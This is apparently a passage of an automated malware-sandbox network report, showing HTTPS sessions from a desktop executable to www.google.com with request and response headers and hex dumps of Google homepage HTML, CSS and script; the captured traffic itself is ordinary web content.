                                                                                                                                                                                                        Data Ascii: ock;line-height:9px;padding-left:20px;margin-top:10px;position:relative}#gbmpi,#gbmpid,#gbmpiw{*display:inline}#gbg5{font-size:0}#gbgs5{padding:5px !important}.gbto #gbgs5{padding:7px 5px 6px !important}#gbi5{background:url(https://ssl.gstatic.com/gb/imag
                                                                                                                                                                                                        2025-01-14 11:40:02 UTC1390INData Raw: 65 69 67 68 74 3a 62 6f 6c 64 7d 2e 67 62 6d 68 7b 62 6f 72 64 65 72 2d 74 6f 70 3a 31 70 78 20 73 6f 6c 69 64 20 23 62 65 62 65 62 65 3b 66 6f 6e 74 2d 73 69 7a 65 3a 30 3b 6d 61 72 67 69 6e 3a 31 30 70 78 20 30 7d 23 67 62 64 34 20 2e 67 62 6d 63 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 35 66 35 66 35 3b 70 61 64 64 69 6e 67 2d 74 6f 70 3a 30 7d 23 67 62 64 34 20 2e 67 62 73 62 69 63 3a 3a 2d 77 65 62 6b 69 74 2d 73 63 72 6f 6c 6c 62 61 72 2d 74 72 61 63 6b 3a 76 65 72 74 69 63 61 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 66 35 66 35 66 35 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 70 78 7d 23 67 62 6d 70 64 76 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 31 70 78 20 73 6f 6c 69 64 20 23 62
                                                                                                                                                                                                        Data Ascii: eight:bold}.gbmh{border-top:1px solid #bebebe;font-size:0;margin:10px 0}#gbd4 .gbmc{background:#f5f5f5;padding-top:0}#gbd4 .gbsbic::-webkit-scrollbar-track:vertical{background-color:#f5f5f5;margin-top:2px}#gbmpdv{background:#fff;border-bottom:1px solid #b
                                                                                                                                                                                                        2025-01-14 11:40:02 UTC1390INData Raw: 64 65 72 2d 74 6f 70 3a 6e 6f 6e 65 3b 63 6f 6c 6f 72 3a 23 30 30 30 20 21 69 6d 70 6f 72 74 61 6e 74 3b 66 6f 6e 74 3a 31 31 70 78 20 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 23 67 62 70 6d 73 7b 2a 77 68 69 74 65 2d 73 70 61 63 65 3a 6e 6f 77 72 61 70 7d 2e 67 62 70 6d 73 32 7b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 77 68 69 74 65 2d 73 70 61 63 65 3a 6e 6f 77 72 61 70 7d 23 67 62 6d 70 61 6c 7b 2a 62 6f 72 64 65 72 2d 63 6f 6c 6c 61 70 73 65 3a 63 6f 6c 6c 61 70 73 65 3b 62 6f 72 64 65 72 2d 73 70 61 63 69 6e 67 3a 30 3b 62 6f 72 64 65 72 3a 30 3b 6d 61 72 67 69 6e 3a 30 3b 77 68 69 74 65 2d 73 70 61 63 65 3a 6e 6f 77 72 61 70 3b 77 69 64 74 68 3a 31 30 30 25 7d 2e 67 62 6d 70 61 6c 61 2c 2e 67 62 6d 70 61 6c 62 7b 66 6f 6e 74 3a
                                                                                                                                                                                                        Data Ascii: der-top:none;color:#000 !important;font:11px Arial,sans-serif}#gbpms{*white-space:nowrap}.gbpms2{font-weight:bold;white-space:nowrap}#gbmpal{*border-collapse:collapse;border-spacing:0;border:0;margin:0;white-space:nowrap;width:100%}.gbmpala,.gbmpalb{font:


                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                        19192.168.2.449748142.250.185.2284436944C:\Users\user\Desktop\#U2800.exe
                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                        2025-01-14 11:40:02 UTC40OUTGET / HTTP/1.1
                                                                                                                                                                                                        Host: www.google.com
                                                                                                                                                                                                        2025-01-14 11:40:02 UTC1200INHTTP/1.1 200 OK
                                                                                                                                                                                                        Date: Tue, 14 Jan 2025 11:40:02 GMT
                                                                                                                                                                                                        Expires: -1
                                                                                                                                                                                                        Cache-Control: private, max-age=0
                                                                                                                                                                                                        Content-Type: text/html; charset=ISO-8859-1
                                                                                                                                                                                                        Content-Security-Policy-Report-Only: object-src 'none';base-uri 'self';script-src 'nonce-MIaW-WQ3cBYQLA8OewgAhA' 'strict-dynamic' 'report-sample' 'unsafe-eval' 'unsafe-inline' https: http:;report-uri https://csp.withgoogle.com/csp/gws/other-hp
                                                                                                                                                                                                        Accept-CH: Sec-CH-Prefers-Color-Scheme
                                                                                                                                                                                                        P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
                                                                                                                                                                                                        Server: gws
                                                                                                                                                                                                        X-XSS-Protection: 0
                                                                                                                                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                        Set-Cookie: AEC=AZ6Zc-WNGmARTLyEn-ql35r55-uyXdmCRAsZbGDghiXfcXy2WkLN_cmoLWo; expires=Sun, 13-Jul-2025 11:40:02 GMT; path=/; domain=.google.com; Secure; HttpOnly; SameSite=lax
                                                                                                                                                                                                        Set-Cookie: NID=520=RKcM0GqqBUr2pr6ZQP_JugHd2wcEysVyRT5sotoL9FLVSX99ydDpjWqoN7Uga5hU0oDDc9Z_PcqtQaultccIWFG6Xnil77syQF5X-Gav7s2u_Hk9v0U23kqtgs83sb45ih4zWL9-Y9D5kQ7Ug4Ipznf4YaVd_7zdRZAz3iCp1clKQkiof27fNgVuzdTS8SiZ9pQL5Ou0Iyo1Y6jAD-Y; expires=Wed, 16-Jul-2025 11:40:02 GMT; path=/; domain=.google.com; HttpOnly
                                                                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                        Accept-Ranges: none
                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                        2025-01-14 11:40:02 UTC190INData Raw: 34 38 63 65 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 69 74 65 6d 73 63 6f 70 65 3d 22 22 20 69 74 65 6d 74 79 70 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 2e 6f 72 67 2f 57 65 62 50 61 67 65 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 53 65 61 72 63 68 20 74 68 65 20 77 6f 72 6c 64 27 73 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 2c 20 69 6e 63 6c 75 64 69 6e 67 20 77 65 62 70 61 67 65 73 2c 20 69 6d 61 67 65 73 2c 20 76 69 64 65 6f 73 20 61 6e 64 20 6d 6f 72 65 2e 20 47 6f 6f 67 6c
                                                                                                                                                                                                        Data Ascii: 48ce<!doctype html><html itemscope="" itemtype="http://schema.org/WebPage" lang="en"><head><meta content="Search the world's information, including webpages, images, videos and more. Googl
                                                                                                                                                                                                        2025-01-14 11:40:02 UTC1390INData Raw: 65 20 68 61 73 20 6d 61 6e 79 20 73 70 65 63 69 61 6c 20 66 65 61 74 75 72 65 73 20 74 6f 20 68 65 6c 70 20 79 6f 75 20 66 69 6e 64 20 65 78 61 63 74 6c 79 20 77 68 61 74 20 79 6f 75 27 72 65 20 6c 6f 6f 6b 69 6e 67 20 66 6f 72 2e 22 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3e 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 6f 64 70 2c 20 22 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 3e 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 3e 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 67 2f 31 78 2f 67 6f 6f 67 6c 65 67 5f 73
                                                                                                                                                                                                        Data Ascii: e has many special features to help you find exactly what you're looking for." name="description"><meta content="noodp, " name="robots"><meta content="text/html; charset=UTF-8" http-equiv="Content-Type"><meta content="/images/branding/googleg/1x/googleg_s
                                                                                                                                                                                                        2025-01-14 11:40:02 UTC1390INData Raw: 30 2c 35 37 2c 31 2c 34 38 2c 39 30 37 2c 34 32 32 2c 32 33 30 2c 33 33 2c 32 34 2c 36 35 2c 35 35 38 2c 31 31 2c 39 35 32 2c 31 2c 36 2c 38 33 32 2c 35 32 31 2c 35 35 2c 31 35 31 2c 33 36 32 2c 32 38 35 2c 31 30 39 2c 36 37 32 2c 32 2c 36 31 2c 31 38 33 2c 33 36 39 2c 37 38 33 2c 31 34 32 2c 32 35 37 2c 33 34 36 2c 36 32 2c 31 38 31 2c 39 31 36 2c 38 33 32 2c 32 35 37 2c 34 39 37 2c 32 34 37 2c 36 31 37 2c 38 34 37 2c 32 36 33 2c 31 37 35 2c 32 30 31 2c 36 36 32 2c 35 34 31 2c 31 38 32 2c 36 2c 31 30 38 2c 31 37 2c 33 2c 33 34 31 2c 34 2c 34 35 36 2c 31 36 2c 33 31 34 2c 31 35 38 30 2c 37 36 30 2c 36 37 36 2c 31 36 38 2c 33 2c 34 31 30 2c 31 36 33 30 2c 31 2c 35 2c 34 2c 34 2c 34 2c 31 34 30 2c 31 30 2c 35 2c 37 31 32 2c 36 34 37 2c 33 2c 32 31 39 2c 34
                                                                                                                                                                                                        Data Ascii: 0,57,1,48,907,422,230,33,24,65,558,11,952,1,6,832,521,55,151,362,285,109,672,2,61,183,369,783,142,257,346,62,181,916,832,257,497,247,617,847,263,175,201,662,541,182,6,108,17,3,341,4,456,16,314,1580,760,676,168,3,410,1630,1,5,4,4,4,140,10,5,712,647,3,219,4
                                                                                                                                                                                                        2025-01-14 11:40:02 UTC1390INData Raw: 49 3d 70 3b 67 6f 6f 67 6c 65 2e 6d 6c 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 6e 75 6c 6c 7d 3b 67 6f 6f 67 6c 65 2e 6c 6f 67 3d 66 75 6e 63 74 69 6f 6e 28 61 2c 62 2c 64 2c 63 2c 68 2c 65 29 7b 65 3d 65 3d 3d 3d 76 6f 69 64 20 30 3f 6b 3a 65 3b 64 7c 7c 28 64 3d 72 28 61 2c 62 2c 65 2c 63 2c 68 29 29 3b 69 66 28 64 3d 71 28 64 29 29 7b 61 3d 6e 65 77 20 49 6d 61 67 65 3b 76 61 72 20 66 3d 6d 2e 6c 65 6e 67 74 68 3b 6d 5b 66 5d 3d 61 3b 61 2e 6f 6e 65 72 72 6f 72 3d 61 2e 6f 6e 6c 6f 61 64 3d 61 2e 6f 6e 61 62 6f 72 74 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 64 65 6c 65 74 65 20 6d 5b 66 5d 7d 3b 61 2e 73 72 63 3d 64 7d 7d 3b 67 6f 6f 67 6c 65 2e 6c 6f 67 55 72 6c 3d 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 62 3d 62 3d 3d 3d 76 6f 69 64 20
                                                                                                                                                                                                        Data Ascii: I=p;google.ml=function(){return null};google.log=function(a,b,d,c,h,e){e=e===void 0?k:e;d||(d=r(a,b,e,c,h));if(d=q(d)){a=new Image;var f=m.length;m[f]=a;a.onerror=a.onload=a.onabort=function(){delete m[f]};a.src=d}};google.logUrl=function(a,b){b=b===void
                                                                                                                                                                                                        2025-01-14 11:40:02 UTC1390INData Raw: 72 65 76 65 6e 74 44 65 66 61 75 6c 74 28 29 7d 2c 21 30 29 3b 7d 29 2e 63 61 6c 6c 28 74 68 69 73 29 3b 3c 2f 73 63 72 69 70 74 3e 3c 73 74 79 6c 65 3e 23 67 62 7b 66 6f 6e 74 3a 31 33 70 78 2f 32 37 70 78 20 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 68 65 69 67 68 74 3a 33 30 70 78 7d 23 67 62 7a 2c 23 67 62 67 7b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 77 68 69 74 65 2d 73 70 61 63 65 3a 6e 6f 77 72 61 70 3b 74 6f 70 3a 30 3b 68 65 69 67 68 74 3a 33 30 70 78 3b 7a 2d 69 6e 64 65 78 3a 31 30 30 30 7d 23 67 62 7a 7b 6c 65 66 74 3a 30 3b 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 34 70 78 7d 23 67 62 67 7b 72 69 67 68 74 3a 30 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 35 70 78 7d 23 67 62 73 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 74 72
                                                                                                                                                                                                        Data Ascii: reventDefault()},!0);}).call(this);</script><style>#gb{font:13px/27px Arial,sans-serif;height:30px}#gbz,#gbg{position:absolute;white-space:nowrap;top:0;height:30px;z-index:1000}#gbz{left:0;padding-left:4px}#gbg{right:0;padding-right:5px}#gbs{background:tr
                                                                                                                                                                                                        2025-01-14 11:40:02 UTC1390INData Raw: 65 66 74 3a 2d 32 70 78 3b 72 69 67 68 74 3a 2d 32 70 78 3b 62 6f 74 74 6f 6d 3a 2d 32 70 78 3b 6f 70 61 63 69 74 79 3a 2e 34 3b 2d 6d 6f 7a 2d 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 33 70 78 3b 66 69 6c 74 65 72 3a 70 72 6f 67 69 64 3a 44 58 49 6d 61 67 65 54 72 61 6e 73 66 6f 72 6d 2e 4d 69 63 72 6f 73 6f 66 74 2e 42 6c 75 72 28 70 69 78 65 6c 72 61 64 69 75 73 3d 35 29 3b 2a 6f 70 61 63 69 74 79 3a 31 3b 2a 74 6f 70 3a 2d 32 70 78 3b 2a 6c 65 66 74 3a 2d 35 70 78 3b 2a 72 69 67 68 74 3a 35 70 78 3b 2a 62 6f 74 74 6f 6d 3a 34 70 78 3b 2d 6d 73 2d 66 69 6c 74 65 72 3a 22 70 72 6f 67 69 64 3a 44 58 49 6d 61 67 65 54 72 61 6e 73 66 6f 72 6d 2e 4d 69 63 72 6f 73 6f 66 74 2e 42 6c 75 72 28 70 69 78 65 6c 72 61 64 69 75 73 3d 35 29 22 3b 6f 70 61 63 69 74
                                                                                                                                                                                                        Data Ascii: eft:-2px;right:-2px;bottom:-2px;opacity:.4;-moz-border-radius:3px;filter:progid:DXImageTransform.Microsoft.Blur(pixelradius=5);*opacity:1;*top:-2px;*left:-5px;*right:5px;*bottom:4px;-ms-filter:"progid:DXImageTransform.Microsoft.Blur(pixelradius=5)";opacit
                                                                                                                                                                                                        2025-01-14 11:40:02 UTC1390INData Raw: 69 6e 67 2d 62 6f 74 74 6f 6d 3a 31 70 78 3b 70 61 64 64 69 6e 67 2d 74 6f 70 3a 32 70 78 7d 2e 67 62 7a 30 6c 20 2e 67 62 74 73 7b 63 6f 6c 6f 72 3a 23 66 66 66 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 7d 2e 67 62 74 73 61 7b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 39 70 78 7d 23 67 62 7a 20 2e 67 62 7a 74 2c 23 67 62 7a 20 2e 67 62 67 74 2c 23 67 62 67 20 2e 67 62 67 74 7b 63 6f 6c 6f 72 3a 23 63 63 63 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 67 62 74 62 32 7b 64 69 73 70 6c 61 79 3a 62 6c 6f 63 6b 3b 62 6f 72 64 65 72 2d 74 6f 70 3a 32 70 78 20 73 6f 6c 69 64 20 74 72 61 6e 73 70 61 72 65 6e 74 7d 2e 67 62 74 6f 20 2e 67 62 7a 74 20 2e 67 62 74 62 32 2c 2e 67 62 74 6f 20 2e 67 62 67 74 20 2e 67 62 74 62 32 7b 62 6f 72 64 65 72 2d 74 6f 70 2d 77
                                                                                                                                                                                                        Data Ascii: ing-bottom:1px;padding-top:2px}.gbz0l .gbts{color:#fff;font-weight:bold}.gbtsa{padding-right:9px}#gbz .gbzt,#gbz .gbgt,#gbg .gbgt{color:#ccc!important}.gbtb2{display:block;border-top:2px solid transparent}.gbto .gbzt .gbtb2,.gbto .gbgt .gbtb2{border-top-w
                                                                                                                                                                                                        2025-01-14 11:40:02 UTC1390INData Raw: 65 2d 68 65 69 67 68 74 3a 39 70 78 3b 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 32 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 31 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 7d 23 67 62 6d 70 69 2c 23 67 62 6d 70 69 64 2c 23 67 62 6d 70 69 77 7b 2a 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 7d 23 67 62 67 35 7b 66 6f 6e 74 2d 73 69 7a 65 3a 30 7d 23 67 62 67 73 35 7b 70 61 64 64 69 6e 67 3a 35 70 78 20 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 67 62 74 6f 20 23 67 62 67 73 35 7b 70 61 64 64 69 6e 67 3a 37 70 78 20 35 70 78 20 36 70 78 20 21 69 6d 70 6f 72 74 61 6e 74 7d 23 67 62 69 35 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 68 74 74 70 73 3a 2f 2f 73 73 6c 2e 67 73 74 61 74 69 63 2e 63 6f 6d 2f 67 62 2f 69 6d 61 67 65 73 2f 62 5f 38 64
                                                                                                                                                                                                        Data Ascii: e-height:9px;padding-left:20px;margin-top:10px;position:relative}#gbmpi,#gbmpid,#gbmpiw{*display:inline}#gbg5{font-size:0}#gbgs5{padding:5px !important}.gbto #gbgs5{padding:7px 5px 6px !important}#gbi5{background:url(https://ssl.gstatic.com/gb/images/b_8d
                                                                                                                                                                                                        2025-01-14 11:40:02 UTC1390INData Raw: 6f 6c 64 7d 2e 67 62 6d 68 7b 62 6f 72 64 65 72 2d 74 6f 70 3a 31 70 78 20 73 6f 6c 69 64 20 23 62 65 62 65 62 65 3b 66 6f 6e 74 2d 73 69 7a 65 3a 30 3b 6d 61 72 67 69 6e 3a 31 30 70 78 20 30 7d 23 67 62 64 34 20 2e 67 62 6d 63 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 35 66 35 66 35 3b 70 61 64 64 69 6e 67 2d 74 6f 70 3a 30 7d 23 67 62 64 34 20 2e 67 62 73 62 69 63 3a 3a 2d 77 65 62 6b 69 74 2d 73 63 72 6f 6c 6c 62 61 72 2d 74 72 61 63 6b 3a 76 65 72 74 69 63 61 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 66 35 66 35 66 35 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 70 78 7d 23 67 62 6d 70 64 76 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 31 70 78 20 73 6f 6c 69 64 20 23 62 65 62 65 62 65 3b 2d
                                                                                                                                                                                                        Data Ascii: old}.gbmh{border-top:1px solid #bebebe;font-size:0;margin:10px 0}#gbd4 .gbmc{background:#f5f5f5;padding-top:0}#gbd4 .gbsbic::-webkit-scrollbar-track:vertical{background-color:#f5f5f5;margin-top:2px}#gbmpdv{background:#fff;border-bottom:1px solid #bebebe;-
                                                                                                                                                                                                        2025-01-14 11:40:02 UTC1390INData Raw: 3a 6e 6f 6e 65 3b 63 6f 6c 6f 72 3a 23 30 30 30 20 21 69 6d 70 6f 72 74 61 6e 74 3b 66 6f 6e 74 3a 31 31 70 78 20 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 23 67 62 70 6d 73 7b 2a 77 68 69 74 65 2d 73 70 61 63 65 3a 6e 6f 77 72 61 70 7d 2e 67 62 70 6d 73 32 7b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 77 68 69 74 65 2d 73 70 61 63 65 3a 6e 6f 77 72 61 70 7d 23 67 62 6d 70 61 6c 7b 2a 62 6f 72 64 65 72 2d 63 6f 6c 6c 61 70 73 65 3a 63 6f 6c 6c 61 70 73 65 3b 62 6f 72 64 65 72 2d 73 70 61 63 69 6e 67 3a 30 3b 62 6f 72 64 65 72 3a 30 3b 6d 61 72 67 69 6e 3a 30 3b 77 68 69 74 65 2d 73 70 61 63 65 3a 6e 6f 77 72 61 70 3b 77 69 64 74 68 3a 31 30 30 25 7d 2e 67 62 6d 70 61 6c 61 2c 2e 67 62 6d 70 61 6c 62 7b 66 6f 6e 74 3a 31 33 70 78 20 41 72
                                                                                                                                                                                                        Data Ascii: :none;color:#000 !important;font:11px Arial,sans-serif}#gbpms{*white-space:nowrap}.gbpms2{font-weight:bold;white-space:nowrap}#gbmpal{*border-collapse:collapse;border-spacing:0;border:0;margin:0;white-space:nowrap;width:100%}.gbmpala,.gbmpalb{font:13px Ar


                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                        20192.168.2.449753142.250.185.2284436944C:\Users\user\Desktop\#U2800.exe
                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                        2025-01-14 11:40:02 UTC40OUTGET / HTTP/1.1
                                                                                                                                                                                                        Host: www.google.com
                                                                                                                                                                                                        2025-01-14 11:40:02 UTC1195INHTTP/1.1 200 OK
                                                                                                                                                                                                        Date: Tue, 14 Jan 2025 11:40:02 GMT
                                                                                                                                                                                                        Expires: -1
                                                                                                                                                                                                        Cache-Control: private, max-age=0
                                                                                                                                                                                                        Content-Type: text/html; charset=ISO-8859-1
                                                                                                                                                                                                        Content-Security-Policy-Report-Only: object-src 'none';base-uri 'self';script-src 'nonce-RaU8IVmsMmMc--wusUW9sg' 'strict-dynamic' 'report-sample' 'unsafe-eval' 'unsafe-inline' https: http:;report-uri https://csp.withgoogle.com/csp/gws/other-hp
                                                                                                                                                                                                        Accept-CH: Sec-CH-Prefers-Color-Scheme
                                                                                                                                                                                                        P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
                                                                                                                                                                                                        Server: gws
                                                                                                                                                                                                        X-XSS-Protection: 0
                                                                                                                                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                        Set-Cookie: AEC=AZ6Zc-Xiwe3ZEZfCUkGpdIfhEA1vnTuErwoki_1fyvz699pWEHzUQm7oJmo; expires=Sun, 13-Jul-2025 11:40:02 GMT; path=/; domain=.google.com; Secure; HttpOnly; SameSite=lax
                                                                                                                                                                                                        Set-Cookie: NID=520=I2z_oMp7yLy3n6h6ClAfgmPpzdlxja51kTNgCI3M3k3fj9XyZK7gAC68SpfAqxJPjFOJoI5KTlj1XWdJi1qaDckIbQns1jKY97F3Tz_kSEchW3sSSQRqse4zHNduQ1buL4pjmObN-wLmnBZTf2EYFR-VrPwCImrmkitSMLAp4mj7xEyMjEg-Xhuw_voo0tDwH9YLHkENSbtH6w; expires=Wed, 16-Jul-2025 11:40:02 GMT; path=/; domain=.google.com; HttpOnly
                                                                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                        Accept-Ranges: none
                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                        2025-01-14 11:40:02 UTC195INData Raw: 34 66 61 66 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 69 74 65 6d 73 63 6f 70 65 3d 22 22 20 69 74 65 6d 74 79 70 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 2e 6f 72 67 2f 57 65 62 50 61 67 65 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 53 65 61 72 63 68 20 74 68 65 20 77 6f 72 6c 64 27 73 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 2c 20 69 6e 63 6c 75 64 69 6e 67 20 77 65 62 70 61 67 65 73 2c 20 69 6d 61 67 65 73 2c 20 76 69 64 65 6f 73 20 61 6e 64 20 6d 6f 72 65 2e 20 47 6f 6f 67 6c 65 20 68 61 73
                                                                                                                                                                                                        Data Ascii: 4faf<!doctype html><html itemscope="" itemtype="http://schema.org/WebPage" lang="en"><head><meta content="Search the world's information, including webpages, images, videos and more. Google has
                                                                                                                                                                                                        2025-01-14 11:40:02 UTC1390INData Raw: 20 6d 61 6e 79 20 73 70 65 63 69 61 6c 20 66 65 61 74 75 72 65 73 20 74 6f 20 68 65 6c 70 20 79 6f 75 20 66 69 6e 64 20 65 78 61 63 74 6c 79 20 77 68 61 74 20 79 6f 75 27 72 65 20 6c 6f 6f 6b 69 6e 67 20 66 6f 72 2e 22 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3e 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 6f 64 70 2c 20 22 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 3e 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 3e 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 67 2f 31 78 2f 67 6f 6f 67 6c 65 67 5f 73 74 61 6e 64 61
                                                                                                                                                                                                        Data Ascii: many special features to help you find exactly what you're looking for." name="description"><meta content="noodp, " name="robots"><meta content="text/html; charset=UTF-8" http-equiv="Content-Type"><meta content="/images/branding/googleg/1x/googleg_standa
                                                                                                                                                                                                        2025-01-14 11:40:02 UTC1390INData Raw: 31 31 2c 31 34 38 2c 31 2c 33 2c 31 30 37 32 2c 33 2c 35 36 34 2c 33 33 31 2c 31 32 39 2c 31 31 35 2c 31 35 32 2c 35 2c 33 35 36 2c 35 31 2c 33 34 33 2c 32 39 32 2c 32 2c 33 38 32 2c 32 2c 34 31 30 2c 37 33 32 2c 32 35 31 2c 31 34 32 2c 32 35 36 2c 33 34 36 2c 36 31 2c 34 31 34 2c 36 38 35 2c 38 33 32 2c 31 34 33 2c 32 30 2c 39 35 2c 31 39 39 33 2c 33 30 35 2c 33 34 37 2c 32 30 31 2c 34 37 37 2c 31 38 31 2c 38 34 31 2c 31 37 2c 33 2c 33 33 39 2c 33 35 38 2c 31 30 34 2c 32 30 2c 31 38 39 2c 31 2c 34 37 38 2c 31 36 31 33 2c 33 36 38 2c 36 37 37 2c 31 36 34 2c 33 2c 34 31 38 2c 36 39 31 2c 39 33 35 2c 31 2c 35 2c 34 2c 34 2c 34 2c 31 34 30 2c 37 32 37 2c 36 34 37 2c 33 2c 32 31 39 2c 35 30 30 2c 33 30 37 2c 33 33 33 2c 31 36 2c 31 2c 31 2c 32 2c 37 37 2c 38
                                                                                                                                                                                                        Data Ascii: 11,148,1,3,1072,3,564,331,129,115,152,5,356,51,343,292,2,382,2,410,732,251,142,256,346,61,414,685,832,143,20,95,1993,305,347,201,477,181,841,17,3,339,358,104,20,189,1,478,1613,368,677,164,3,418,691,935,1,5,4,4,4,140,727,647,3,219,500,307,333,16,1,1,2,77,8
                                                                                                                                                                                                        2025-01-14 11:40:02 UTC1390INData Raw: 6c 6c 7d 3b 67 6f 6f 67 6c 65 2e 6c 6f 67 3d 66 75 6e 63 74 69 6f 6e 28 61 2c 62 2c 64 2c 63 2c 68 2c 65 29 7b 65 3d 65 3d 3d 3d 76 6f 69 64 20 30 3f 6b 3a 65 3b 64 7c 7c 28 64 3d 72 28 61 2c 62 2c 65 2c 63 2c 68 29 29 3b 69 66 28 64 3d 71 28 64 29 29 7b 61 3d 6e 65 77 20 49 6d 61 67 65 3b 76 61 72 20 66 3d 6d 2e 6c 65 6e 67 74 68 3b 6d 5b 66 5d 3d 61 3b 61 2e 6f 6e 65 72 72 6f 72 3d 61 2e 6f 6e 6c 6f 61 64 3d 61 2e 6f 6e 61 62 6f 72 74 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 64 65 6c 65 74 65 20 6d 5b 66 5d 7d 3b 61 2e 73 72 63 3d 64 7d 7d 3b 67 6f 6f 67 6c 65 2e 6c 6f 67 55 72 6c 3d 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 62 3d 62 3d 3d 3d 76 6f 69 64 20 30 3f 6b 3a 62 3b 72 65 74 75 72 6e 20 72 28 22 22 2c 61 2c 62 29 7d 3b 7d 29 2e 63 61 6c 6c 28 74 68
                                                                                                                                                                                                        Data Ascii: ll};google.log=function(a,b,d,c,h,e){e=e===void 0?k:e;d||(d=r(a,b,e,c,h));if(d=q(d)){a=new Image;var f=m.length;m[f]=a;a.onerror=a.onload=a.onabort=function(){delete m[f]};a.src=d}};google.logUrl=function(a,b){b=b===void 0?k:b;return r("",a,b)};}).call(th
